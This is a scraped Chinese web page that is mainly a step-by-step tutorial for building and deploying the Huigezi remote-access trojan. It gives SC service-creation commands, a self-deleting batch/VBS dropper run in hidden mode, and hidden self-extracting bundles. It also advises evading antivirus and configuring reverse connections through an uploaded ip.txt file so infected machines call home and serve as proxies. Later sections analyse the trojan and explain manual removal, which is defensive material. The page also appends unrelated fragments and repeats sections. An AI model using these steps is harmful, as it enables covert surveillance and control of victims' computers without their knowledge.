灰鸽子远程控制完整详细教程
(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)
第一部份:网络人远程监控软件
Netman监控版详细安装方法:
1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
优化连接速度。通常不建议选择“中转”,因为连接速度正常时,选上反而会使得速度变慢。在没选择的情况下,软件会根据网络状况,自行判断是否通过服务器中转。软件还有许多设置选项,在不了解功能的情况下,不要随意修改。
第二部份:
灰鸽子教程
准备工具:
鸽子服务端
IcoSprite图标更改器;
SC.exe服务添加删除更改工具;
winrar
程序特点:
自解压形式,双击即可
制作过程:
1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。
2.用SC创建一个服务
运行CMD.EXE 在system32的目录下运行执行
SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"
‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"
‘这句是将huigezi服务的描述改为“不死鸽子”
sc config wuauserv depend= huigezi
‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg
4.创建一个BA T文件,并命名为update.bat
@regedit /s %systemroot%\system32\1.reg
@%systemroot%\system32\gezi.exe
@del /q /f /s %systemroot%\system32\1.reg
@del /q /f /s %systemroot%\system32\Update.vbs
@del /q /f /s %systemroot%\system32\Update.bat
5.创建一个vbs并命名为update.vbs
目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
里面写上如下代码:
On Error Resume Next
set wshshell=createobject ("wscript_.shell")
a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)
6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海....
7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解
当然解压模式依旧全部隐藏,替换同名文件
现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机
这个方法可以用到其他的木马中
捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"
灰鸽子第一章:软件相关介绍:
灰鸽子[VIP 专业版]
1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!
2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!
3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜
a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!
b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!
5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.
6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!
7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,
9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
11.软件附带有四款实用工具:
a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!
b. 内网端口映射器:它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!
c. FTP服务器: 可以开本机FTP服务!
d. Web服务器:可以建立一个简单的Web服务器!
12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.
13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!
功能简单介绍:
【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!
【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!
【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!
【5】telnet(超级终端).
【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!
【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,
筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!
【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!
【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!
【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!
注册灰鸽子软件后享有:
⒈享用软件的所有功能,没有任何限制!
⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!
⒊可以使用我们的专用上线系统,无需其它域名和空间支持!
⒋得到我们更好的技术服务!
注:[VIP版] 包括VIP2005、V ersion 1.2、V ersion 2.0 !
[企业版]用户只能使用企业版!不能使用其它版本!
5.加入会员后,会自动加入官方论坛。享受官方技术支持
灰鸽子是一款要交钱的软件,也就是说,你使用VIP版的话是要交给作者每年几十块钱的使用费(不作任何评论)因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰鸽子的官方网站进行验证,从而可以不用交钱就可以使用,相关版本有:影子鹰破解专用版,爱儿破解版,以及华夏黑客联盟的灰鸽子sunray破解版。
今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式,只可实验,不可做坏事,大家不喜欢请跳过这一章。
第一节:未雨绸缪,实验准备。
第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~
第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。(这一点,等一下会详细解说)
第二节:实战开始。
把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。
解压的文件里面有以下几个文件:
H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。
http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。
sunray.exe 这个里面其实也就只是一个host,它把https://www.doczj.com/doc/8a5945042.html,这个网站的域名本地解析到本机,而不是解析到官方网站。vip_2005_0113.rar 这个是验证的软件,当我
下载这一个到客户端,用来验证用的。
其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。
第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。
第二步,首先运行sunray.exe,然后运行http.exe 点开始服务!
第三步,运行客户端,也就是H_Client.exe这个文件,
点击“自动上线”选项,有几个要点要说的,
1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)
2)“自动连接密码”,这个是表示你可以连接到的电脑所要用到的密码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”
3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我们的软件是破解版的,官方的那个服务器我们是用不了啦~~~
4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。
“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看着办,看着喜欢就选吧~~~^_^
“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的,这也是我们经常说的手
个的优先级是系统级的,所有使用这台电
脑的用户都会启动木马。
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~
“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去改它的,默认就行。
"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~
配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就生成了,不要运行它,运行了你就会中木马的,(不准做坏事)
软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你可以控制这台电脑了。具体有什么内容你自己摸索,
如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~
·没有路由密码权限时的鸽08-23 ·上网安全V ista自我防范10-11
·让濒临崩溃的Windows XP 10-11 ·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11 ·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10 ·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10 ·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10 ·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09 ·中意网络提供免费100M免10-09
·与众不同Windows XP开始10-08 ·让桌面图标翻跟斗在XP上10-08
·上海宽元站长资助计划-提10-08 ·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07 ·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06 ·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06 ·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06 ·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05 ·UuShare提供免费网络文件10-05
[推荐]灰鸽子超级详细教程(看了就会)热荐★★★★★灰鸽子超级详细教程(看了就会)文章整理发布:黑客风云文章来源:https://www.doczj.com/doc/8a5945042.html, 更新时间:2007-1-16 13:12:53
灰鸽子第三章:服务端工作方式:
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事
,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。
下面介绍服务端:
配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改。
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子
遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll 文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。
灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。
灰鸽子第四章:双管齐下,手工和软件清除灰鸽子。
一.灰鸽子的手工检测
由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。
但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子服务端。
由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。
在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。
2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows 的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。
3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll 的文件。
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。
二、灰鸽子的手工清除
经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。
注意:为防止误操作,清除前一定要做好备份。
(一)、清除灰鸽子的服务
注意清除灰鸽子的服务一定要在注册表里完成,对注册表不熟悉的网友请找熟悉的人帮
后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
3、删除整个Game_Server项。
98/me系统:
在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。
(二)、删除灰鸽子程序文件
删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子VIP 2005 服务端已经被清除干净。
以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。
三、防止中灰鸽子病毒需要注意的事项
1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用,是非常必要的补丁程序
2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是10位以上,字母+数字+其它符号的组合;也可以禁用/删除一些不使用的帐户
使用网络防火墙软件,网络防火墙在防病毒过程中也可以起到至关重要的作用,能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁,这点也比较无奈,这部分用户不妨通过使用网络防火墙来进行
一定防护
4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。这些都可以用winxp总管等优化软件关闭。
5. 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,外挂程序等。
四、灰鸽子(Huigezi、Gpigeon)专用检测清除工具
软件名称:灰鸽子(Huigezi、Gpigeon)专用检测清除工具
界面语言:简体中文
软件类型:国产软件
运行环境:/Win9X/Me/WinNT/2000/XP/2003
授权方式:免费软件
软件大小:414KB
软件简介:由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除VIP2005版灰鸽子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端运行DelHgzvip2005Server.exe文件清除VIP2005版灰鸽子服务端程序,运行un_hgzserver.exe文件清除灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端
结束语:写完了这篇教程,我也该准备重装系统了,因为我运行了自己生成的木马,体验到了它的强大功能,不想手工去清除了,直接重装算了。
原创作者unis 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件(又称客户端,生成出的木马叫服务端)数不胜数,甚至很多已经是源码爆出,对于各种远程控制软件来说,其实基本都是具备以下功能: 【屏幕监控】:可以查看被控制者的屏幕,保存捕获的被控制屏幕的截图。并且看到对方的一切操作,可以自由选定图像位色查看,还 可以选择是否控制对方鼠标、键盘,若选择即可控制对方的电脑鼠标、键盘,这一控制对方是可以看到鼠标被控制。 【文件管理】:可以在后台查看被控者的各个磁盘中的文件,直接显示隐藏文件,可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程
Windows7系统封装教程(详细图解) Windows7系统封装教程(详细图解) 一、封装前准备 1、Windows7官方发布的安装光盘(镜像)(这里就不提供给大家了,大家自己想办法) 2、需要预装的各种应用软件,如Office/、Photoshop、Win7优化大师等等,当然,作为对软媒的支持,也加上闪游浏览器和酷点吧。 3、UltraISO和Windows7 AIK。Windows7 AIK简体中文版的下载地址为: download.microsoft./download/6/3/1/631A7F90-E5CE-43AA-AB05-EA82AEAA402A/KB3AIK_.iso 4、WindowsPE光盘(最好是Windows7PE光盘)。Windows7PE光盘可以使用Windows7AIK制作,也可以在以下地址下载: /zh-/files/709d244c-2e5a-11de-a413-0019d11a795f/ 二、安装操作系统和应用程序
1、安装Windows7操作系统。 安装操作系统有4个环节要注意: ①操作系统最好安装在C盘,安装期间(包括后面安装应用程序 和进行封装)最好不要连接到网络。 ②如果在安装操作系统过程中输入序列号,进行封装以后再重新 安装操作系统不会再提示输入序列号。除非要制作成OEM版的封装系统,否则在安装过程中提示输入序列号时,不要输入序列号,直接点―下一步‖继续系统的安装。③为保持封装系统纯净,安装好Windows7操作系统后最好不要安装硬件的驱动。当然,安装驱动程序也不会影响系统的封装。 ④为避免调整优化系统、安装应用软件过程中出现不必要的错误 和产生错误报告文件,第一次进入系统后应当禁用UAC和关闭错误报告。禁用UAC和关闭错误报告的方法如下: ——打开―控制面板‖,点击―系统和安全‖,选择―操作中心‖,点击―安全‖,在展开的详细设置内容中找到并点击―用户帐户控制‖下方的―选择您 UAC级别‖,
Erwin工具使用指南(版本号:V )
文档修订状况
目录 第一章基本概念 (4) 数据模型(Modal) (4) 视图 (4) 逻辑视图(Logical) (4) 物理视图(Physical) (4) 第二章操作指南 (6) 新建模型 (6) 视图切换 (7) 新建主题区域 (7) 切换主题区域 (9) 编辑主题区域 (10) 选择现有数据实体到指定的主题区域。 (10) 在主题区域新建数据实体 (11) 在主题区域删除数据实体 (12) 数据实体导航 (13)
第一章基本概念 1.1数据模型(Modal) 数据模型是数据实体(Entity)和数据实体间的关系(Relationship)总和。可以简单的理解认为数据实体就是对应数据库表,实体间的关系就是表之间的关系。 1.2视图 Erwin对数据模型提供两种视——逻辑视图、物理视图。 1.2.1逻辑视图(Logical) 是以业务需求的概念对数据模型进行描述。通俗的说,在逻辑视图中我们可以用中文或描述性的语言来描述数据实体(表)和数据实体的属性(字段)。下面就是一个对车辆信信息实体的逻辑视图。 1.2.2物理视图(Physical) 物理视图与逻辑视图一一对应,物理视图是针对一种具体的数据库进行逻辑视图的物理映射。通俗的说,在物理视图中我们必须为每一个在逻辑视图中出现的数据实体(表)指定一个可被具体数据库接纳的表名称,譬如我们使用MySQL作为我们的数据库实现,我们就必须为具体的实体指定一个数据库表名(英文单词或词组),同样的对实体属性(字段)的命名也需进行转换,数据类型也需要具体为数据库支持的数据类型。下面就是对应车辆信息实体针对MySQL数据的物理视图。
灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以 上的端口来完成! 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读 取系统设定的代理服务器信息,无需用户设置! 3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专 用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都 可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性 !同时具用牵手版的搜索符合条件主机的功能: a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了! 5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、 上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性. 6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制! 7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表 显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息, 9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机 有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第 三方软件支持!支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具: a. EXE工具: 可以修改任何EXE文件图标,支持真彩色! b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使 你在局域网内部也能使用自动上线功能! c. FTP服务器: 可以开本机FTP服务! d. Web服务器: 可以建立一个简单的Web服务器! 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用
灰鸽子使用教程图解 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
